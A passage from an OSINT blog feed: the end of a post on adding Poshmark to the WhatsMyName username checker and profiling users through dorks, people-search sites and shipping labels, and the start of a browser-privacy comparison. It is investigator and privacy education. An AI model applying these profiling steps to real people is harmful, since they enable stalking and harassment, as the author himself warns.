srcset="https://substackcdn.com/image/fetch/$s_!J4af!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fd21fcea4-3134-4df4-841d-cf346c73c0ca_691x376.png 424w, https://substackcdn.com/image/fetch/$s_!J4af!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fd21fcea4-3134-4df4-841d-cf346c73c0ca_691x376.png 848w, https://substackcdn.com/image/fetch/$s_!J4af!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fd21fcea4-3134-4df4-841d-cf346c73c0ca_691x376.png 1272w, https://substackcdn.com/image/fetch/$s_!J4af!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fd21fcea4-3134-4df4-841d-cf346c73c0ca_691x376.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>As we can see, a valid page says &#8220;&lt;username&gt; or &lt;Real Name&gt; is using Poshmark to sell items from their closet,&#8221; whereas we see &#8220;Page Not Found &#8212; Poshmark&#8221; if there is no user by that name. Now, to verify the HTTP codes.</p><h4>Checking HTTP Codes</h4><p>Next, we have to check the HTTP codes to input them into WhatsMyName. I found <a href="https://httpstatus.io/">https://httpstatus.io/</a> as an easy website to do it in one single transaction for both accounts.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!wTVO!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F6833917a-28d6-407c-aec2-63c0dcfbaaf9_800x594.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!wTVO!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F6833917a-28d6-407c-aec2-63c0dcfbaaf9_800x594.png 424w, https://substackcdn.com/image/fetch/$s_!wTVO!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F6833917a-28d6-407c-aec2-63c0dcfbaaf9_800x594.png 848w, https://substackcdn.com/image/fetch/$s_!wTVO!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F6833917a-28d6-407c-aec2-63c0dcfbaaf9_800x594.png 1272w, https://substackcdn.com/image/fetch/$s_!wTVO!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F6833917a-28d6-407c-aec2-63c0dcfbaaf9_800x594.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!wTVO!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F6833917a-28d6-407c-aec2-63c0dcfbaaf9_800x594.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/6833917a-28d6-407c-aec2-63c0dcfbaaf9_800x594.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!wTVO!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F6833917a-28d6-407c-aec2-63c0dcfbaaf9_800x594.png 424w, https://substackcdn.com/image/fetch/$s_!wTVO!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F6833917a-28d6-407c-aec2-63c0dcfbaaf9_800x594.png 848w, https://substackcdn.com/image/fetch/$s_!wTVO!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F6833917a-28d6-407c-aec2-63c0dcfbaaf9_800x594.png 1272w, https://substackcdn.com/image/fetch/$s_!wTVO!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F6833917a-28d6-407c-aec2-63c0dcfbaaf9_800x594.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Instead of using my current browser for the user-agent string, I changed it to Firefox Desktop because I noticed that the<code>header</code> variable in the code for WhatsMyName is set to that user-agent string. At the bottom, we see that the valid account has an HTTP 200 code and, the non-existent account has a 404.</p><p>Now, we need to edit the <code>web_accounts_list.json</code> file.</p><pre><code>},{         "name" : "Poshmark",         "check_uri" : "https://poshmark.com/closet/{account}",         "account_existence_code" : "200",         "account_existence_string" : " is using Poshmark to sell items from their closet.",         "account_missing_string" : "Page not found - Poshmark",         "account_missing_code" : "404",         "known_accounts" : ["alice","bob"],         "category" : "shopping",         "valid" : true      }</code></pre><p>Now when we run the code, the script will check Poshmark.</p><p><strong>I did some analysis using friends&#8217; accounts that are both sellers and buyers. Even if a person is only a buyer, they are still listed as having a closet.</strong></p><blockquote><p>As of August 24, this is included in the WhatsMyName script, the Profiler module in Recon-ng, and the Web Application.</p></blockquote><h3>Further Poshmark OSINT</h3><p>As I was probing around the Poshmark site to solve the problem from the previous section, I came across some other things of interest to an OSINT investigator.</p><h4>Google Dorking</h4><p>First, after we have positive confirmation of the username, if we use the Google Dork of <code>site:poshmark.com &lt;user name&gt;</code>, we can see what they are mentioned in or have commented on. Below is a screenshot with all usernames and identifying information obscured. The black boxes are where the user name I searched for appear in the results.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!kkOX!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F430dbea4-66f2-42f8-8ecd-68e32f1435a0_800x606.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!kkOX!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F430dbea4-66f2-42f8-8ecd-68e32f1435a0_800x606.png 424w, https://substackcdn.com/image/fetch/$s_!kkOX!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F430dbea4-66f2-42f8-8ecd-68e32f1435a0_800x606.png 848w, https://substackcdn.com/image/fetch/$s_!kkOX!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F430dbea4-66f2-42f8-8ecd-68e32f1435a0_800x606.png 1272w, https://substackcdn.com/image/fetch/$s_!kkOX!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F430dbea4-66f2-42f8-8ecd-68e32f1435a0_800x606.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!kkOX!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F430dbea4-66f2-42f8-8ecd-68e32f1435a0_800x606.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/430dbea4-66f2-42f8-8ecd-68e32f1435a0_800x606.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!kkOX!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F430dbea4-66f2-42f8-8ecd-68e32f1435a0_800x606.png 424w, https://substackcdn.com/image/fetch/$s_!kkOX!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F430dbea4-66f2-42f8-8ecd-68e32f1435a0_800x606.png 848w, https://substackcdn.com/image/fetch/$s_!kkOX!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F430dbea4-66f2-42f8-8ecd-68e32f1435a0_800x606.png 1272w, https://substackcdn.com/image/fetch/$s_!kkOX!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F430dbea4-66f2-42f8-8ecd-68e32f1435a0_800x606.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>While this is somewhat trivial, it can help us build a dossier on someone&#8217;s spending habits, fashion taste, and other things.</p><h4>Harvesting other user info</h4><p>Next, we will do the somewhat obvious. We will analyze the username (using tools like WhatsMyName, <a href="https://namechk.com/">NameChk</a>, and <a href="https://github.com/sherlock-project/sherlock">Sherlock</a>). Furthermore, depending on what the user has on their profile, we may be able to ascertain the following:</p><ul><li><p>Location</p></li><li><p>Last login time (derived from last comment or post)</p></li><li><p>School/College/University</p></li><li><p>Website</p></li><li><p>Clothing sizes (unless they are doing Poshmark as a business)</p></li><li><p>Possible pictures not shared elsewhere</p></li></ul><p>Given these data vectors, we can extract information from the following:</p><ul><li><p>Alumni Associations</p></li><li><p>People Search Engines (i.e. <a href="https://www.familytreenow.com/">FamilyTreeNow</a>, <a href="https://www.truepeoplesearch.com/">TruePeopleSearch</a>, <a href="https://www.fastbackgroundcheck.com/">FastBackGroundCheck</a>, and <a href="https://www.fastbackgroundcheck.com/">FastPeopleSearch</a>) then move to public, voter, or property records</p></li><li><p>Web technologies and email addresses</p></li><li><p>Reverse image searches</p></li><li><p>General news in a specific area</p></li><li><p>Other social media platforms</p></li></ul><p>This is a point where the possibilities are near-endless. This could be the goldmine we seek, especially if the person has little concept of OPSEC or privacy.</p><h4>Shipping Labels</h4><p>The final source of intelligence from Poshmark is their shipping labels. While I know some information is required to ensure delivery. The main part that I take issue with is the username. There is no reason for this to be on the labels. An adversary that sees this posted online or handles mail or packages could use the same techniques discussed above to stalk, harass, or harm a buyer solely using the label.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!7bod!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1c587e01-3ff1-4e7f-8be3-d9521d6c19ef_630x915.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!7bod!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1c587e01-3ff1-4e7f-8be3-d9521d6c19ef_630x915.png 424w, https://substackcdn.com/image/fetch/$s_!7bod!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1c587e01-3ff1-4e7f-8be3-d9521d6c19ef_630x915.png 848w, https://substackcdn.com/image/fetch/$s_!7bod!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1c587e01-3ff1-4e7f-8be3-d9521d6c19ef_630x915.png 1272w, https://substackcdn.com/image/fetch/$s_!7bod!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1c587e01-3ff1-4e7f-8be3-d9521d6c19ef_630x915.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!7bod!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1c587e01-3ff1-4e7f-8be3-d9521d6c19ef_630x915.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/1c587e01-3ff1-4e7f-8be3-d9521d6c19ef_630x915.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!7bod!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1c587e01-3ff1-4e7f-8be3-d9521d6c19ef_630x915.png 424w, https://substackcdn.com/image/fetch/$s_!7bod!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1c587e01-3ff1-4e7f-8be3-d9521d6c19ef_630x915.png 848w, https://substackcdn.com/image/fetch/$s_!7bod!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1c587e01-3ff1-4e7f-8be3-d9521d6c19ef_630x915.png 1272w, https://substackcdn.com/image/fetch/$s_!7bod!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1c587e01-3ff1-4e7f-8be3-d9521d6c19ef_630x915.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>I frequently encourage people to avoid using the same username everywhere &#8212; just like with passwords. But, as with passwords, it often falls on deaf ears. There&#8217;s nothing wrong with populating the username across multiple websites; I discourage actually using the name on all sites for real accounts. From an OPSEC perspective, feel free to register the username then populate it with garbage data. Be on the lookout for a blog about that in the future.</p><h3>Conclusion</h3><p>In conclusion, this was a great learning experience. Furthermore, it proves that we can scrape intelligence out of almost any resource. There are definitely things that I would like to see changed with Poshmark, but for now, I will enjoy the ride and the source of OSINT.</p>]]></content:encoded></item><item><title><![CDATA[Browsers for Privacy, OPSEC, and OSINT]]></title><description><![CDATA[When doing an OSINT or OPSEC/Privacy investigation, not all browsers are created equal. Despite our best efforts at anonymity, they can&#8230;]]></description><link>https://tidbit.theosintion.com/p/browsers-for-privacy-opsec-and-osint-b4157382f218</link><guid isPermaLink="false">https://tidbit.theosintion.com/p/browsers-for-privacy-opsec-and-osint-b4157382f218</guid><dc:creator><![CDATA[Joe Gray]]></dc:creator><pubDate>Sat, 22 Aug 2020 21:20:05 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!wyDd!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F8d61d458-7dd0-4996-a6a8-ce560cd571b9_800x450.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>When doing an OSINT or OPSEC/Privacy investigation, not all browsers are created equal. Despite our best efforts at anonymity, they can have unfiltered access to what we are viewing. Depending on the browser, it could be used for recommendations, sometimes ads. As with all software, there are always possibilities of vulnerabilities, including zero-days.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!wyDd!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F8d61d458-7dd0-4996-a6a8-ce560cd571b9_800x450.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!wyDd!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F8d61d458-7dd0-4996-a6a8-ce560cd571b9_800x450.jpeg 424w, https://substackcdn.com/image/fetch/$s_!wyDd!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F8d61d458-7dd0-4996-a6a8-ce560cd571b9_800x450.jpeg 848w, https://substackcdn.com/image/fetch/$s_!wyDd!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F8d61d458-7dd0-4996-a6a8-ce560cd571b9_800x450.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!wyDd!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F8d61d458-7dd0-4996-a6a8-ce560cd571b9_800x450.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!wyDd!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F8d61d458-7dd0-4996-a6a8-ce560cd571b9_800x450.jpeg" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/8d61d458-7dd0-4996-a6a8-ce560cd571b9_800x450.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!wyDd!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F8d61d458-7dd0-4996-a6a8-ce560cd571b9_800x450.jpeg 424w, https://substackcdn.com/image/fetch/$s_!wyDd!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F8d61d458-7dd0-4996-a6a8-ce560cd571b9_800x450.jpeg 848w, https://substackcdn.com/image/fetch/$s_!wyDd!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F8d61d458-7dd0-4996-a6a8-ce560cd571b9_800x450.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!wyDd!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F8d61d458-7dd0-4996-a6a8-ce560cd571b9_800x450.jpeg 1456w" sizes="100vw" fetchpriority="high"></picture><div></div></div></a></figure></div><p>The purpose of this article is more than just &#8220;patch your browser and use a VPN.&#8221; Both concepts are important to the cause, but they are not infinite. In theory, both a Lamborghini and a Pinto can get you from point A to point B. The difference is within the experience, bells and whistles, and reliability. Modern browsers can get us to almost any website reliably, so that is a given. <em>Whether anyone else has access to seeing us reliably get to a website is a different story &#8212; that is the intent behind <a href="https://www.torproject.org/">Tor browser</a>.</em></p><p>I will be honest, I am not a fan of Safari and even less of a fan of IE/Edge. I like <a href="https://www.mozilla.org/en-US/firefox/privacy/">Mozilla&#8217;s Privacy Promise</a>, but Chrome (to me) feels more sleek, streamlined, and efficient. That being said, Chrome is a Google product, so it is a reasonable assumption to deduce that some usage data is sent back to the mothership. Firefox is open-source, Chrome is not. There are some plugins/extensions only available for one or the other (i.e. <a href="https://hunch.ly/">Hunch.ly</a>) that warrants using Chrome.</p><p>Like with anything OSINT related, I double down on getting multiple opinions, so I like to use multiple browsers. Recently, I was introduced to <a href="https://brave.com/?ref=soc369/">Brave</a>. It&#8217;s open-source and built on Chromium, so I could replicate that Chrome experience. I was almost immediately enamored. <em>Bonus points, Hunch.ly works on Brave.</em></p><h3>Comparison and Contrast of Browsers</h3><p>In the section below, I will compare and contrast the browsers. I am leaving Tor off since it will fall under a different list ;-)</p><h4>Chrome</h4><p>Chrome is sleek and acts as a well-oiled machine. The main issue I have with it is that it seems to &#8216;listen&#8217; a little too much. The availability of extensions for various types of tasks and capabilities makes Chrome a formidable competitor.</p><h4>Firefox</h4><p>Firefox is open source and comes from Mozilla, which evangelize their Privacy Promise. The main drawback in my opinion is the limited plugins available for the platform and that it doesn&#8217;t seem to be as fast as Chrome or the Chromium derivatives (Brave and Vivaldi).</p><p>While it is minor for me since I use Hunch.ly and <a href="https://monosnap.com/">Monosnap</a>, Firefox does have a <a href="https://screenshots.firefox.com/">built-in screenshot tool</a>. Also, a minor issue for me, is that Firefox has a built-in master password in addition to the password manager, whereas Brave and Chrome do not. I use an independent password manager that works with all browsers, so I don&#8217;t really care about this feature.</p><p><strong>I haven&#8217;t put it to the test in a while, but I was able to use procdump to dump Firefox and extract passwords for a <a href="https://www.youtube.com/watch?v=zbCaYhK04Dc">demonstration for a talk</a>. in the past couple of years. I have not tested this recently in Firefox or other browsers, but as of 2016, <a href="https://www.wired.com/2016/08/browser-password-manager-probably-isnt-enough/">using the browser&#8217;s password manager was not a good idea.</a></strong></p><h4>Brave</h4><p>My current favorite browser. Based on the open-source Chromium. Has support for all of the Chrome extensions that I have attempted to use. Brave blocks ads and trackers, seemingly better than Firefox. <strong>I also have a <a href="https://pi-hole.net/">PiHole</a> running &#8212; but it mostly addresses ads.</strong></p><p>This is a legitimate concern for me, but the PiHole will stop some of the threats and could stop more if I could find the time to enhance the ruleset. I plan on upgrading to a dual security appliance setup of a <a href="https://store.netgate.com/pfSense/SG-1100.aspx">pfSense</a> and <a href="https://www.ui.com/unifi-routing/usg/">Ubiquiti Security Gateway</a>.</p><p>In about a month, I have saved some time and hassle in using Brave.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!E_US!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2d4775a-18b3-47db-bc2d-fa90111f5727_596x131.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!E_US!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2d4775a-18b3-47db-bc2d-fa90111f5727_596x131.png 424w, https://substackcdn.com/image/fetch/$s_!E_US!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2d4775a-18b3-47db-bc2d-fa90111f5727_596x131.png 848w, https://substackcdn.com/image/fetch/$s_!E_US!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2d4775a-18b3-47db-bc2d-fa90111f5727_596x131.png 1272w, https://substackcdn.com/image/fetch/$s_!E_US!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2d4775a-18b3-47db-bc2d-fa90111f5727_596x131.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!E_US!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2d4775a-18b3-47db-bc2d-fa90111f5727_596x131.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/b2d4775a-18b3-47db-bc2d-fa90111f5727_596x131.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!E_US!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2d4775a-18b3-47db-bc2d-fa90111f5727_596x131.png 424w, https://substackcdn.com/image/fetch/$s_!E_US!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2d4775a-18b3-47db-bc2d-fa90111f5727_596x131.png 848w, https://substackcdn.com/image/fetch/$s_!E_US!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2d4775a-18b3-47db-bc2d-fa90111f5727_596x131.png 1272w, 